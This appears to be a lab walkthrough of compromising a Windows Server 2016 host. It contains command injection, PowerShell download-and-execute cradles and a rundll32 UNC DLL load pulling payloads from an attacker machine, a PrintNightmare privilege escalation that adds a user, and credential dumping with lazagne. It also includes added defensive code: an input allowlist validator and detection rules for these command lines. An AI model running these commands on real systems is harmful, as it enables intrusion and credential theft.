# Brief
Enumerate the host (starting with an `nmap` scan to identify accessible ports and services), leverage the command injection flaw to gain a reverse shell, and escalate privileges to `SYSTEM` or an equivalent account.
# Initial Enum
- `ping` test
- still seeing lost packets after restarting the VPN and grabbing a new `.ovpn` file - maybe a firewall is blocking ICMP ![[images/Pasted image 20260228193934.png]]
- `nmap` scan - light, with the `-Pn` flag (skip host discovery, since ICMP looks blocked) ![[images/Pasted image 20260228194222.png]]
- `nmap` scan - detailed ![[images/Pasted image 20260228194530.png]]
- check out the web server ![[images/Pasted image 20260228194557.png]] ![[images/Pasted image 20260228194615.png]]
- try simple command injection ![[images/Pasted image 20260228194837.png]]
- let's open up `burp`
- POST request ![[images/Pasted image 20260228195646.png]]
- we need to try different command injection operators
- `&` and `;` don't seem to work
- `|` works ![[images/Pasted image 20260228195757.png]] ![[images/Pasted image 20260228200319.png]]
- NOTE: `SeImpersonatePrivilege` is enabled - Potato attack
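The `&` / `;` vs `|` observation above is the classic failure of blocklist filtering: the app rejects two operators and lets the third through. As an added defender-side example (not code from the original notes or from the target app), the Python below contrasts a blocklist check that behaves the way the notes describe with an allowlist validator that accepts only an IP literal or a hostname, and builds the `ping` invocation as an argv list so no shell ever parses the parameter. The function names and the assumption that the app rejected exactly `&` and `;` are mine; the notes only report which operators failed and which worked.

```python
import ipaddress
import re
from typing import List

# Blocklist as the notes suggest the target app behaves: "&" and ";" are rejected,
# "|" is not. This is an assumption about the app, made for illustration.
WEAK_BLOCKLIST = {"&", ";"}

# Allowlist: a DNS label is 1-63 chars of [A-Za-z0-9-], not starting or ending with "-".
_LABEL = r"[A-Za-z0-9](?:[A-Za-z0-9-]{0,61}[A-Za-z0-9])?"
HOSTNAME_RE = re.compile(rf"(?:{_LABEL}\.)*{_LABEL}\.?")


def weak_filter_accepts(value: str) -> bool:
    """Blocklist check: True unless a listed character is present.
    Anything not on the list ("|", "||", "`", "$(...)", newlines, ...) passes through."""
    return not any(ch in value for ch in WEAK_BLOCKLIST)


def is_valid_host(value: str) -> bool:
    """Allowlist check: accept only a bare IPv4/IPv6 literal or a syntactically valid hostname.
    Whitespace and shell metacharacters can never satisfy either branch."""
    if not value or len(value) > 253:
        return False
    try:
        ipaddress.ip_address(value)  # raises ValueError for anything that is not an IP literal
        return True
    except ValueError:
        pass
    return HOSTNAME_RE.fullmatch(value) is not None


def build_ping_argv(value: str) -> List[str]:
    """Return the argv list for a single Windows echo request, or raise on invalid input.
    Handing argv to subprocess.run(..., shell=False) means no shell parses the parameter,
    so operator characters have no meaning even if validation were ever bypassed."""
    if not is_valid_host(value):
        raise ValueError(f"rejected host parameter: {value!r}")
    return ["ping", "-n", "1", value]


if __name__ == "__main__":
    # Constructed sample inputs: two legitimate hosts and the two operator cases from the notes.
    for sample in ["10.10.15.203", "web01.example.local",
                   "10.10.15.203 | whoami", "10.10.15.203 & whoami"]:
        print(f"{sample!r:32} blocklist={weak_filter_accepts(sample)!s:5} "
              f"allowlist={is_valid_host(sample)}")
```

The blocklist branch is only there to show the failure mode; the validator plus argv execution is the pattern to ship, and it is what makes the `|` case in the notes a non-event on the server side.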
# Command Injection
- we can either inject a revshell directly or inject a command that fetches the revshell from an HTTP server on Kali
- let's create an `.asp` payload with `msfvenom`, host it from Kali, and inject an `IEX (IWR ...)` command to pull it ![[images/Pasted image 20260228200741.png]]
- host `shell.asp` from Kali ![[images/Pasted image 20260228200812.png]]
- setup listener on port 4444 ![[images/Pasted image 20260228200849.png]]
- set up command injection with URL encoding
```powershell
IEX (iwr 'http://10.10.15.203:8000/shell.asp')
```
![[images/Pasted image 20260228201138.png]]
- didn't work
- let's try a different command that assumes the injection lands in `cmd.exe` and launches `powershell.exe` explicitly, then URL encode it and inject again
```powershell
powershell.exe -Command "IEX (iwr 'http://10.10.15.203:8000/shell.asp')"
```
![[images/Pasted image 20260228201714.png]]
- okay, the HTTP server was hit that time but the shell did not call back to the listener
- maybe because I was using `nc` instead of `meterpreter`
- set up `multi/handler` in Metasploit and try again ![[images/Pasted image 20260228202126.png]]
- still not hitting
- let's try a different shell ![[images/Pasted image 20260228202427.png]]
- this is `shell.exe` instead of `shell.asp`
- update the command injection ![[images/Pasted image 20260228202516.png]]
- still no hit on listener
- try the `smb_delivery` module from earlier in this module ![[images/Pasted image 20260228203126.png]]
- set options and run ![[images/Pasted image 20260228203151.png]]
- URL encode the command below (taken from the module output) and inject it
```cmd
rundll32.exe \\10.10.15.203\aAOFT\test.dll,0
```
![[images/Pasted image 20260228203233.png]]
- we have a hit ![[images/Pasted image 20260228203423.png]]
- light internal enum
- systeminfo ![[images/Pasted image 20260228203514.png]]
- privs & groups ![[images/Pasted image 20260228203539.png]]
- enumerate patches
- we have the KBs here ![[images/Pasted image 20260228203606.png]]
- try `lazagne.exe`
- nothing found
- since we know the target is Server 2016, let's try `PrintNightmare`
- `git clone` the repo and append the line below to `CVE-2012-1675.ps1`
```powershell
Invoke-Nightmare -NewUser "jacob" -NewPassword "password" -DriverName "print"
```
![[images/Pasted image 20260228210132.png]]
- host this `.ps1` file from Kali and use the command injection to run it via `IEX (IWR ...)`
```cmd
powershell.exe -Command "IEX (iwr 'http://10.10.15.203:8000/CVE-2012-1675.ps1')"
```
- getting an error - maybe `IWR` isn't available ![[images/Pasted image 20260228210828.png]]
- try a different command
```cmd
powershell IEX(New-Object Net.WebClient).DownloadString('http://10.10.15.203:8000/CVE-2012-1675.ps1')
```
- I was still getting errors, but it was because the HTTP server was not running in the proper directory
- now the `.ps1` file was downloaded to the target and executed ![[images/Pasted image 20260228211348.png]]
- try logging in over RDP - `rdesktop` works but `xfreerdp3` does not
- got errors at first, but after editing the `.ps1` file to use a longer password that included symbols and numbers, we are on the box
- light internal enum ![[images/Pasted image 20260228211921.png]]
- now let's run lazagne
- now, because we are a privileged user, we recover lots of passwords ![[images/Pasted image 20260228212320.png]]
- look for `confidential.txt`
```powershell
get-childitem -Path "C:\" -Filter "confidential.txt" -File -Recurse
```
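Every stage of the chain above leaves a process-creation footprint on the host: the web worker spawning a command interpreter (the injection itself), `rundll32` loading a DLL from a UNC path (the `smb_delivery` stage), and PowerShell evaluating a web download (the `IEX` / `iwr` / `DownloadString` stage). As an added detection example (not part of the original notes), the Python below runs three rules over constructed process-creation events shaped like the fields a Sysmon Event ID 1 or Windows 4688 record carries. The event values are constructed from the command lines in the notes plus benign noise; `w3wp.exe` as the parent assumes the site runs under IIS, which the notes do not state.

```python
import re
from typing import Callable, Dict, List, Tuple

Event = Dict[str, str]

# Constructed process-creation events modelled on the command lines in the notes above
# (parent, image, command line), plus three benign events that should not trigger anything.
SAMPLE_EVENTS: List[Event] = [
    {"parent": r"C:\Windows\System32\inetsrv\w3wp.exe",
     "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": r"cmd.exe /c ping -n 1 10.10.15.203 | whoami"},
    {"parent": r"C:\Windows\System32\cmd.exe",
     "image": r"C:\Windows\System32\rundll32.exe",
     "cmdline": r"rundll32.exe \\10.10.15.203\aAOFT\test.dll,0"},
    {"parent": r"C:\Windows\System32\cmd.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": 'powershell.exe -Command "IEX (iwr \'http://10.10.15.203:8000/CVE-2012-1675.ps1\')"'},
    {"parent": r"C:\Windows\System32\cmd.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell IEX(New-Object Net.WebClient).DownloadString('http://10.10.15.203:8000/CVE-2012-1675.ps1')"},
    {"parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\rundll32.exe",
     "cmdline": r"rundll32.exe C:\Windows\System32\shell32.dll,Control_RunDLL"},
    {"parent": r"C:\Windows\System32\svchost.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r"powershell.exe -File C:\scripts\backup.ps1"},
    {"parent": r"C:\Windows\System32\inetsrv\w3wp.exe",
     "image": r"C:\Windows\System32\PING.EXE",
     "cmdline": "ping -n 1 10.10.15.203"},
]

# rundll32 followed by a UNC path (two leading backslashes, a host, another backslash).
UNC_DLL_RE = re.compile(r"rundll32(?:\.exe)?\s+\\\\[^\\\s]+\\", re.IGNORECASE)
# Invoke-Expression (or its alias) fed by a web download primitive.
CRADLE_RE = re.compile(
    r"(?:iex|invoke-expression)\b.*?(?:iwr|invoke-webrequest|downloadstring|net\.webclient)",
    re.IGNORECASE,
)
SHELLS = {"cmd.exe", "powershell.exe", "pwsh.exe"}


def _basename(path: str) -> str:
    """Lower-cased file name from a Windows path."""
    return path.rsplit("\\", 1)[-1].lower()


def web_worker_spawns_shell(ev: Event) -> bool:
    """IIS worker process starting a command interpreter: the footprint of command injection."""
    return _basename(ev["parent"]) == "w3wp.exe" and _basename(ev["image"]) in SHELLS


def rundll32_unc_dll(ev: Event) -> bool:
    """rundll32 loading a DLL straight from a UNC share."""
    return _basename(ev["image"]) == "rundll32.exe" and UNC_DLL_RE.search(ev["cmdline"]) is not None


def powershell_download_cradle(ev: Event) -> bool:
    """Download-and-evaluate pattern in any command line, whichever image launched it."""
    return CRADLE_RE.search(ev["cmdline"]) is not None


RULES: List[Tuple[str, Callable[[Event], bool]]] = [
    ("web_worker_spawns_shell", web_worker_spawns_shell),
    ("rundll32_unc_dll", rundll32_unc_dll),
    ("powershell_download_cradle", powershell_download_cradle),
]


def match_rules(ev: Event) -> List[str]:
    """Names of every rule that fires on one event, in RULES order."""
    return [name for name, rule in RULES if rule(ev)]


def triage(events: List[Event]) -> List[Dict[str, object]]:
    """Return only the events that triggered at least one rule, with the rule names attached."""
    hits = []
    for ev in events:
        names = match_rules(ev)
        if names:
            hits.append({"rules": names, "cmdline": ev["cmdline"]})
    return hits


if __name__ == "__main__":
    for hit in triage(SAMPLE_EVENTS):
        print(", ".join(hit["rules"]), "<-", hit["cmdline"])
```

The parent-child rule is the one that would have caught the very first `|` payload, before any download or DLL load happened; the other two are the stages most likely to survive if the attacker changes operators or moves to a different web application.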